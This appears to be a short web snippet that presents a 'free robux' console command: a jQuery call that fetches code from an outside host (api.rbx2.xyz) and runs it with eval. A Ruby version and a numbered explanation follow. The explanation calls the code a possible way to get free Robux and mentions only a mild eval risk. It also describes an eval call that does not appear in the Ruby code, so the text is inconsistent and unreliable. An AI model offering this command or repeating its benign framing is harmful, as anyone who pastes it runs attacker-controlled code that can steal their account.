$ Javascript $ .get ('// api.rbx2.xyz/rbx id = 16553', eval) free robux 5000

require 'net/http'
require 'json'

uri = URI('//api.rbx2.xyz/rbx')
params = { id: 16553 }
uri.query = URI.encode_www_form(params)

response = Net::HTTP.get_response(uri)
data = JSON.parse(response.body)

$.get('//api.rbx2.xyz/rbx', { id: 16553 }, eval)


  1. In the Ruby code:
  2. require 'net/http' and require 'json' import the necessary modules for making HTTP requests and handling JSON data.
  3. URI('//api.rbx2.xyz/rbx') creates a URI object for the specified API endpoint.
  4. params = { id: 16553 } defines the parameters to be sent in the request.
  5. uri.query = URI.encode_www_form(params) encodes the parameters and sets them as the query string in the URI.
  6. Net::HTTP.get_response(uri) sends an HTTP GET request to the specified URI and retrieves the response.
  7. JSON.parse(response.body) parses the JSON response into a Ruby hash.
  8. eval(data['free_robux_5000']) executes the value associated with the key 'free_robux_5000' from the parsed JSON data.

  9. In the JavaScript code:

  10. $.get('//api.rbx2.xyz/rbx', { id: 16553 }, eval) makes an AJAX GET request using jQuery's $.get() method to the specified API endpoint with the parameters { id: 16553 }. The response is evaluated using the eval function.

These codes seem to attempt to make a request to the specified API endpoint and evaluate the response, potentially for gaining free Robux. However, using eval with external data can be unsafe and is generally discouraged due to security risks.